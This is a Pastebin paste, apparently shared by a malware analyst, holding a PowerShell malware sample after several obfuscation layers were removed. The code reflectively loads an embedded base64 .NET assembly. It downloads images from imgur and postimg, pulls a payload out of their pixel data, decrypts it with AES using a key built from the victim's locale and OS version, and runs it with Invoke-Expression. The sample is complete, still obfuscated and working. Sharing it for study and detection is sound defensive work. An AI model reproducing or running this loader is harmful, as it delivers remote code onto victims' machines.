Advertisement
dissectmalware

Mal Powershel - After unwrapping 8-layer obfuscation

Mar 7th, 2019
840
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. function v`10A{[Reflection.Assembly]::"L`oaD"([Convert]::("{4}{1}{0}{3}{2}" -f 'e6','s','ring','4St','FromBa').Invoke(("{53}{231}{186}{7}{45}{6}{120}{104}{110}{203}{242}{150}{97}{67}{125}{138}{106}{226}{94}{66}{75}{44}{123}{100}{29}{136}{92}{91}{227}{187}{207}{38}{28}{223}{146}{202}{195}{162}{85}{32}{86}{238}{51}{23}{244}{116}{77}{109}{142}{0}{73}{158}{113}{43}{181}{229}{8}{39}{166}{243}{78}{164}{211}{42}{189}{12}{232}{65}{16}{237}{141}{96}{48}{41}{222}{145}{200}{83}{132}{112}{173}{169}{205}{101}{131}{34}{127}{143}{119}{121}{52}{163}{176}{117}{107}{236}{154}{31}{126}{17}{214}{68}{212}{175}{245}{155}{124}{59}{15}{167}{219}{98}{129}{221}{63}{153}{224}{156}{64}{89}{46}{152}{159}{61}{4}{36}{47}{168}{230}{170}{135}{246}{74}{14}{19}{215}{24}{213}{115}{225}{184}{114}{165}{190}{204}{95}{69}{177}{178}{191}{82}{118}{3}{216}{9}{88}{35}{139}{37}{79}{76}{62}{209}{180}{21}{57}{102}{206}{208}{27}{241}{105}{108}{147}{10}{193}{25}{218}{161}{228}{240}{122}{84}{99}{234}{188}{239}{1}{5}{50}{217}{13}{54}{151}{144}{87}{235}{70}{233}{130}{183}{133}{49}{58}{90}{56}{2}{220}{210}{80}{196}{128}{111}{72}{81}{149}{201}{172}{55}{60}{71}{179}{140}{93}{11}{192}{30}{197}{40}{185}{137}{148}{18}{26}{198}{160}{33}{157}{199}{194}{103}{22}{182}{134}{174}{20}{171}" -f'BT5gAMAAAAAAIAiw','AAAAAAAADQ','uADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMAAuADAALgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','AAQIGCAMGEQwEAAAAAAQBAAAABAABAAAE6AMAAAU','mxlAFN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljAElFbnVtZXJhYmxlYDEAVG','CNAAAAFYAUwBfAFYAR','AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgB','A//8AALgAAAAAAAAAQAAAAA','AigQAAAKKhswAwCIAAAABgAAEXMkAAAKCnMlAAAKCwZyAQAAcG8mAAAKcxw','gAwESEQgIBgcCEg0SIQIGD','AAAAAAAAAAAAAAAAAAAAAAAAAA','AAAAAAAAAAAAAAAAgAAAMAAAA4','AC','AkAAQAAABUAHIAYQBu','W9yeVN0c','AERlcml2YXRpb25JdGVyYXRpb25zAFRQeXIAR2VuZXJhdGUyNTZCaXRzT2ZSYW5kb21FbnRyb3B5AHBmAHNyYwBibXAAbgB','AYs','ABIQAbBDYBGQCQAD0BcQAmBEMBUQAV','AA','mVhbQBDcnlwdG9TdHJ','AAAAAAAAAAAAAAAAAAAAAAAAAA','AAAAAAA','AA','gsBxEIbwgA','yZWFtAENyeXB0b1N0cmVhbU','AAAAAAAAAAAAAAAAAAAAAAAAAAA','AAAAAAAAAAAAAAAAAAAAAAAAAAAA','GwAAAAAAP8lA','oDAAAChhdWAsrDgcYWhIFKA0AAAoYXVgLBhdYCgYeXS0eBygDAAAGCwct','ACAAUALCQAAGQ','AAAAAAAAAAAAAAAA','QCQACUAuQCQA','cxwAAAoTCBE','AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','AQAAAA','EtCAgDIAAFAyAADgwHCQgIDggIES','FrZQBUb0FycmF5AFNraXAAU3lzdGVtLlNlY3V','0FCAUgAQERUQUgAQERVQggAhJZHQUdBQUgAQEdBQkgAwESZRJZEWkHIAMIHQUICAQAABJxByADDh0FCAgaBw0dBR0FHQUdBRJBH','AAAAKy4HGFoSBSgLAAAKGF1YCyseBxhaEgU','AAAoMCCgnAAAKDXMEAAAGJglzKA','AAAAAAA','AdAEpnAAoAAAAAAgAMAGVxAAoAAAAAA','beKAksBglvC','8IAAAK3AYqAAEQAAACAA4ACRcA','A','AAAAAAA','9HAGdldF9CAENoYXIAVG9TdHJpbmcAQ29uY2F0AENvbnZlcnQARnJvbUJhc2U2NFN0cmluZwBTeX','yaXR5LkNyeXB0b2dyYXBoeQBSZmMyODk4RGVyaXZ','AAAg','lAA','QBSAFMASQBPAE4AXwBJAE4ARgBPAAA','AChEKFhELbyEAAAoTDN48EQksBxEJbwgAAArcEQ','AACWAH8AGgACAHghAAAAAJYAhAAgAAMAoSEAAAAAh','TVqQ','AHMAbABhAH','AAAAAA','VgBlAHIAcwBpAG8AbgAAADAALgAwAC4AMAA','AAAAAM4uAAAAIAAAAAAAAAAAAAAAAAAA','AA','JTExfV0lUSF9aRVJPUwBLZXlzaXpl','AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','ZW0uTGlucQBFbnVtZXJhY','DQcHEn0SXRJdEhEODg4IAQAIAA','mFwaGljcwBGcm9tSW1hZ2UARHJhd0ltYWdlAElEaXNwb3NhYmxlAERpc3Bvc2U','EdldFBpeGVsAGdldF9SAG','gAAArcBywGB28IAAAK3','CAAAAQAAAAAQAAAASAAAAAAAAAAAAA','AAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAA','DUACAAQADoA','AAcwA6AC8ALwBpAG0AYQBnAGUAcwAyAC4AaQBtAGcAYgBvAHgALgBjAG8AbQAvAGIANwAvADAAMgAvAFoAdQBFAEkAVgBuADcAZQBfAG8','sAGUAVgBlAHIAcwBpAG8AbgAAAA','AAAAAAAAAAAAAAAAAAAA','AAAAAAAAAAAAAAAAAA','Bn8gAMAAAAAAIAYwCb/gAMAAAAAAIAUQC5CgEMAAAAABswAgAjAAAABQAAER8','GVEZWNyeXB0b3IAU3lzdGVtLklPAE1lb','AAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAFgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAA','CgEOCAABDhUSPQEO','Q','KKAUAA','QUSSRJZEl0SYR0FCA4GBwIdBRJ1BSABHQUOBgABEhESZQUgAQESEQwQAQIVEj0BHgAeAAgD','AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','6XFYZNOC','AjR1VJRA','AAAAAAAAAAAA','oRBhEFCG8bAAAKEwcJ','IEQcWc','bgAAAAAAIAAAADAAC','gYgAh','dldF','UABJAEMALgBkAGwAbAAAADQACAABAFAAcgBvAGQAdQBjAHQA','AAAA','AAAAAAAAAAAAAAA','AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','AAAGAucnNyYwAAAJA','tAFJlcGVhdAAAAAAAX2gAdAB0AH','RBioBNAAAAgAkADldAAoAAA','AAAAAAAAAAAAAAAAAAAAAAGAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','F0dHJpYnV0ZQBQSUMAZ2V0X1dpZHRoAG','AAAAAAA','DALgAAAAAAAEgAAA','AJwBhQEKAKgBTQAGAMUBOgAGANkBOgAKAOYBTQAGAAcCOgAGABwCOgAOAE0CQQIGAHMCWAIGALACkwIGAMMCkwIGANgCkwIGAOgCkwI','AAAAAAAAAADAL','AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','Bwcm9ncmFtIGNhbm5vdCBiZ','AAAAAAAAAAAAAAAAA','AIAAAAAAAAAAAAAAAA','QAFwAQQCxAWQAQQC7AWsASQDRASUAUQDgAXoAGQDsAX0AWQD1AYQAWQD7AYQAWQABAoQAYQAMAogAUQAVAkQACQCQACUAaQAk','AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','QsBxEEbwgAAArcEQwqAAAAAUAAAAIAnwA72gAMAAAAA','SBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJU1flwAAAAAAAAAAOAAAiELAQsAABAAAAAGAAAAAAAA3i4AAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAA','AAAAAA','AAAAAAAAAAgAAAVcdAgAJCgAAAPolMwAWAAABAAAAHwAAAAUAAAAFAAAACQAAAAUAAAAqAAAABAAAAAIAAAAGAAAAAQAAAAQAAAABAAAABAAAAAAACgABAAAAAAAGAEEAOgAG','oLBwZvIwAACt4KBywGB2','Y4A','UAQ','csBxEHbwgAAArcEQYsBxEGbwgAAArcE','AAgBKQCQAFMAMQCQACUAIQBwAVgAIQB6AVgAGQC','JCLA/X38R1Qo6BgABEg0SEQUAAQ4SDQQAAQgIAyA','9ACkAUCAAAAA','TM0hVGhpcy','AlgBpABMAAQCkIAAA','AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','AAA','Btc2NvcmxpYgBTeXN0ZW0AT2JqZWN0AEVudW0AU3lzdGVtLkRyYXdpbmcAQml0bWFwAEltYWdlAENyZWF0ZU5vbkluZGV4ZWRJbWFnZQBCaWFkAHJldmVyc2VCaXRzAC5jdG9yAHZhbHVlX18ASElESU5HAEZ','EgAAAAAAAAAAAAA','CUA+QAOBD','AAAQABAAAAEAASABgABQABAAEAAwEAAB8AAAAJAAEABQAAABAAJQAYAAUABAAFAAEAEAArABgABQAGAAgABgaWACkAVoCeACwAVoClAC','AAA','dldF9IZWlnaHQAU3lzdGVtLkRy','MAAuADAALgAwAC4AMAAAADAACAABAEkAbgB0AGUA','GAAkDkwIGAB0DkwIGADUDkwIGAGADVgMGAG0DkwIGAHoDVgMGAIEDkwIGAJIDOgAGAK4DogMGAMoDkwIGAOMDkwISAAQE+QMAAAAA','AAANAIAACUAQAAI0Jsb2I','5AHIAaQBnAGgAdAAAACAAAAA4AAgAAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQB','AAAAAAAAAAAAAAAAA','zZX','KAAABAAA','AAAA','AC50ZXh0AAAA5A4AAAAgAAAAEAAAA','0IAwgEBwIICAUAAR0FDhAQAQIVEj0BHgAVEj0BHgAIAwoBBQwQAQEdHgAVEj0BHgAHIAMBDh0FCAUgAR','AAAAAAAAAAAAAAAAAAAAAA','gZvCAAACtw','AIAkw','wAUYC1ACkAUYC','AAQAwADAAMAAwADAANABiADAAAAAsAAIAAQBGAGkAbABlAEQAZQBzAGMAcgBpAHAAdABpAG8A','AdjQuMC4zMDMxOQAAAAAFAGwAAAC8AwAAI34AACgEAAAwBAAAI1N0cmluZ3MAAAAAWAgAAGgAAAAj','XWBMGEQYZMoYRBBdYEwQRBAJvAwAACj9j////CRdYDQkCbwQAAAo/S////','AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','AAAAAAAAAAAAAAAA','ABAAAAAAAAAAAAAAAJAuAABLAAAAAEAAAJACAAA','QAaQBvAG4AAAAAAAAAsASUAQAAAQBTAHQAcgBpAG4AZwBGAGkAbABlAEkAbgBmAG8AAABwAQA','N','AU3RyaW5nAEV','s4AkQCQACUAmQD7AlMAmQAUA9QAmQApA9oAmQBGA+AAuQCQAOkAwQCQAO8AyQCXA/kAyQCcAyUA4QC3AwEB4QDAAwYB6QCQACUA8QDPAukA+','UAEAAAA8TW9kdWxlPgBQSUMuZGxsAFNUcG9rAFN0ZWZhbgBTdGF0ZQBDaGlpRQBnYXZibw','R5AENvbG9yA','AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','gjRsAAAEKcyIAAA','0ZW0uQ29yZQBTeXN0','AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','AAAAAA','EGIAABAABvGAAAChEGF28ZAAAKEQYYbxoAAA','hiQACUABACsIQAAAACWANIARAAEABQjAAAAAJEA1wBKAAYAVCMAAAAAhhiQACUABgBcIwAAAACWAPYATwAGACQkAAAAAIYYk','AYTB','EdldFN0cmluZwBSTkdDcnlwdG9TZXJ2aWNlUHJvdmlkZXIAUmFuZG','AACigCAAAGEwQRBHJhAABwHwoo','UVHZ2AExpbW1hAFN5c3RlbS5SdW50aW1lLkNvb','lQn','gAKAFwATQAKAGMATQAGAC4BDgEG','AR2V0Qnl0ZXMAUmlqbmRhZWxNYW5hZ2VkAFN5bW1ldHJpY0FsZ29yaXRobQB','AAA','A','AEgAO','AAAAA','AAAAAAAAAAAAAAEAMQAAAAAABAAAAAA','AAlAAYAAAABAPkAAAABAP0AAAABAAEBAAABAAMBAAAC','ALgBwAG4AZwAAAzAAAAAAAINXYiCZvsFJ','kOwV','AAAAAAAAAAAAAAAAAAA','GNlcHRpb25UaHJvd3MBALguA','CgAA','AAAAAAAA','cgBuAGEAbABOAGEAbQBlAAAAUABJAEMALgBkAGwAbAAAACgAAgABAEwAZQBnAGEAbABDAG8AcAB','l0ZQBSZWFkAENsb3NlAFN5c3RlbS5UZXh0AEVuY29kaW5nAGdldF9VVE','AAAAAAAAAAAAAAAAAAAAAA','AAAEAAA','AAAAAAAAAAAAAAAAAAAABswBAA1AAAAAQAAEQJvAwAACgJvBAAACiAKICYAcwUAAAoKBigGAAAKCwcCFhZvBwAACt4KBywGB28IAAAK3AYqAAAAARAAAAIAHgALKQAKAAAAABMwAwDIAAAAAgAAERYKFgt+CQAACgwWDTipAAAAFhMEOJAAAAA','BAAEAAAAwAACA','AA','9','h6o+/0EACLd','D4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','CGFsQAAcXWAsHHjLrBioeAigQAAAKKgAAABswBAAZAQAABAAAEQIoEQAACgoGHyAoAQAAKygCAAArCwYfICgDAAArHyAoAQAAKygCAAArDAYfQCgDAAArBo5pH0BZKAEAACsoAgAAKw0DByDoAwAAcxUAAAoTBBEEHyBvFgAAChMFcxcAAAoTBh','AAAAAAAAAAAAAAAAAAAAAAAA','AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','AAAAAAAAAAAAAAAAAAAAAAAAAA','VVMAwAgAABAAAA','AAAAAAAAAAAAAAAA','wgqEzADAB0AAAADAAARFgoWCysRBhhaAhhdWAo','B','tTnVtYmVyR2VuZXJhdG9yAFN5c3RlbS5OZXQAV2ViQ2xpZW50AERvd25sb2FkRGF0YQBGcm9tU3RyZWF','AE4BDgEK','gAAAAAAAAAAX','CEQQJbwoAAAoTBRYTBit1BhldEwgRCEUDAAAAAgAAABIAAAAi','0NvckRsbE1haW4AbXNjb3JlZS5kb','AAAAAeAQABAFQCFldyYXBOb25Fe','AAAAAAAAAAAAAAAAAAAAAAAA','QdvHwAAChEFEw','CAAUAD8ALgALAGsBLgATAHQBcwCMAJkADgEpAV0BBIAAAAAAAAAAAAAAAAAAAAAAbAEAAAQA','1vZG','AlQBCAAIADAACAAMA','lYW0AU3R','AAg4ODgQAAB0FAwAADgQgAQEIAyAACAcgAwEICBEdBgABEiESEQc','AAAC9BO/+AAABAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAQAAAACAAAAAAAAAAAAAAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAA','AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','XBpbGVyU2VydmljZXMAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eU','AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','YXdpbmcuSW1hZ2luZwBQaXhlbEZvcm1hdABHc','gAGAHV7AAoAAAAAHgIoEAAACipCU0pCAQABAAAAAAAMAAA','AggqB9ETBwgSBygOAAAKKA8AAAoMEQY','tcH','n','AAC','AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','AAAAAAAAAAAAAAA','AAAe','l0ZXMARGVyaXZlQnl0ZXM','AAMA','twILAYIbw','AA','AAAAAAAAAAABABAAAAAYAACAAAAAAAAAAAAAAAAAAAA','AABAEYAaQB','Ap4AcQCBAqQAcQCGArkAcQCOAqQAgQCQAMYAiQDPA','B','x0AAAoTCQmOaY0bAAABEwoRCREKFhEKjmlvHgAAChMLEQhvHwAAChEJbx8AAAooIAA','AAAAAAAAAAAAAAAAAAABAAAAAABIAAAAWEAAADQCAAAAA','AAAAAAAAAAAAAAAAA','CAAEAAAAAAAAAAAAAAA','AAAAAAEAAAEAAAAAAA','BAAAKygqAAA','AArcEQ','AAAAAAAAACgBNAAAAAAAEAAAAAAAAAAAAAAABADUCAAAAAAQAAAAAAAAAAAAAAAEAOgAAAAAAAwACACUAtQAnALUAKQC1AFMA','RfQmxvY2tTaXplAENpcGhlck1vZGUAc2V0X01vZGUAUGFkZGluZ01vZGUAc2V0X1BhZGRpbmcASUNyeXB0b1RyYW5zZm9ybQBDcmVhd'))) | O`Ut-nUll;${G`gG}=[Stefan.gavbo]::('pf').Invoke();i`eX(${g`Gg})};function v`6B{[Reflection.Assembly]::("{1}{2}{0}{5}{4}{3}"-f 'it','Loa','dW','alName','Parti','h').Invoke(("{4}{0}{3}{2}{1}" -f 'y','urity','.Sec','stem','S')) | Ou`T-Nu`Ll;s`AL ('DF') ("{1}{0}{2}" -f 'je','New-Ob','ct');ad`d`-Type -AssemblyName ("{0}{3}{2}{4}{1}"-f'Syst','ng','m.Draw','e','i');${RE`GeX} = [regex]((("{2}{3}{0}{1}" -f '.+)83Y',')','83Y','(('))-CRePlaCe '83Y',[char]92);function N`ICE {param ([String]${da`Yh}, [String]${co`LSS})${n`YY} = [Convert]::("{1}{3}{2}{0}"-f'ring','FromBas','64St','e').Invoke(${D`AYH});${L`G} = DF ("{0}{6}{10}{7}{5}{9}{8}{3}{1}{11}{4}{2}" -f'System.Se','l','d','e','ge','tog','curi','.Cryp','Rijnda','raphy.','ty','Mana');${lg}."MO`DE" = [System.Security.Cryptography.CipherMode]::"c`BC";${lg}."P`AdDi`Ng" = [System.Security.Cryptography.PaddingMode]::"zE`ROS";${f`W} = dF ("{1}{2}{0}"-f '[]','By','te')(32);[Array]::("{1}{0}" -f'opy','C').Invoke(${n`yY}, 0, ${fW}, 0, 32);${H`E} = D`F ("{5}{13}{9}{6}{7}{2}{0}{4}{11}{12}{3}{1}{8}{10}"-f 'Cryp','r','ity.','e','tography.R','Sy','u','r','ive','m.Sec','Bytes','fc28','98D','ste')(${c`o`LSs},${fW});${d`Cz} = ${hE}.("{0}{2}{1}"-f 'G','tBytes','e').Invoke(32);${D`Efs} = ${H`e}.("{2}{0}{1}"-f'tByt','es','Ge').Invoke(16);${HM`AC} = d`F ("{0}{8}{2}{9}{10}{4}{3}{6}{1}{7}{5}" -f 'Syst','HMA','curi','ph','gra','1','y.','CSHA','em.Se','ty.Cry','pto')(,${HE}.("{1}{0}"-f'Bytes','Get').Invoke(20));${e`ed`Er} = ${h`maC}."c`OmPuteH`A`sH"(${N`yY}, 52, ${n`Yy}."LE`NgTH" - 52);${f`As} = ${L`g}.("{0}{3}{2}{4}{1}" -f 'Cr','or','ateDecr','e','ypt').Invoke(${d`cz}, ${DE`FS});${J`MA} = ${f`As}.("{0}{1}{3}{4}{2}"-f'Tr','an','Block','sfor','mFinal').Invoke(${N`yY}, 52, ${n`YY}."l`eN`gTH" - 52);${D`Am} = d`F ("{0}{4}{1}{3}{2}"-f 'Syste','I','am','O.MemoryStre','m.')(${J`mA}, ${f`ALsE});if (${J`MA}[0] -eq 0x1f) {${D`Am} = d`F ("{2}{5}{9}{0}{4}{3}{8}{7}{6}{1}" -f'.IO','am','Sy','ion','.Compress','ste','ipStre','GZ','.','m')(${d`AM}, [IO.Compression.CompressionMode]::"De`COMpr`e`Ss")}${Str`E`Am`REaDER} = dF ("{5}{3}{2}{0}{1}{4}{6}"-f '.IO.St','reamR','m','e','ea','Syst','der')(${d`AM}, ${Tr`UE});${St`R`Ea`mREA`DEr}.("{0}{2}{1}" -f 'Re','ToEnd','ad').Invoke()};Function Vn(${C`iU}){${b`CZA}  = [System.Convert]::("{3}{1}{0}{4}{2}"-f 'se6','omBa','ng','Fr','4Stri').Invoke(${c`IU});${H`FS} = [System.Text.Encoding]::"U`Tf8"."geTSTR`i`Ng"(${bC`za});return ${H`Fs}};${t`mp}=(("{1}{2}{7}{6}{5}{3}{0}{8}{4}{9}"-f'Ph3','https','://i','50','.p','img.cc/kn','st','.po','h/6A','ng?dl=1'),("{5}{1}{4}{3}{6}{0}{2}" -f 'pn','.c','g','m/wRli0q','o','https://i.imgur','z.'));foreach(${u`RL} in ${t`mp}){${Ry} = [System.Net.WebRequest]::("{0}{1}"-f 'Crea','te').Invoke(${u`RL});${r`y}."m`EthoD" = ("{1}{0}" -f 'EAD','H');${r`A} = ${r`Y}.("{2}{0}{1}" -f'spons','e','GetRe').Invoke();${Ff}=${R`A}."C`onTEn`TLeNgTH"; if (${fF} -ge 55555){${G}=D`F ("{4}{3}{2}{0}{5}{1}" -f'rawi','tmap','.D','tem','Sys','ng.Bi')((D`F ("{0}{2}{1}" -f 'Ne','nt','t.WebClie')).("{2}{0}{1}"-f'pen','Read','O').Invoke(${u`Rl}));${O}=Df ("{0}{1}"-f'B','yte[]') 217000;(0..433)|%{foreach(${x} in(0..499)){${P}=${G}.("{0}{1}" -f 'GetPixe','l').Invoke(${x},${_});${o}[${_}*500+${x}]=([math]::("{0}{1}"-f'Flo','or').Invoke((${p}."B"-band15)*16)-bor(${p}."g" -band 15))}};${e`cHO1}=[System.Text.Encoding]::"uT`F8"."Ge`Ts`Tr`iNG"(${O}[0..216623]);${p`UI} = ${r`e`GEX}.("{1}{0}"-f'tch','ma').Invoke((get-cUl`T`U`RE)."e`NGLIS`HNAmE")."gr`OupS"[1]."v`AlUe"+""+[Environment]::"o`sv`E`RSiON"."Vers`I`on"."MaJ`OR";${J`AA} = nI`cE -Dayh ${Ech`O1} -Colss ${p`UI};${u`Y}=V`N(${J`Aa});i`ex(${uY});break}}};if ([environment]::"OsVER`sI`ON"."VERs`i`on"."m`AJOr" -eq 6){V`6b}else{v10A}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement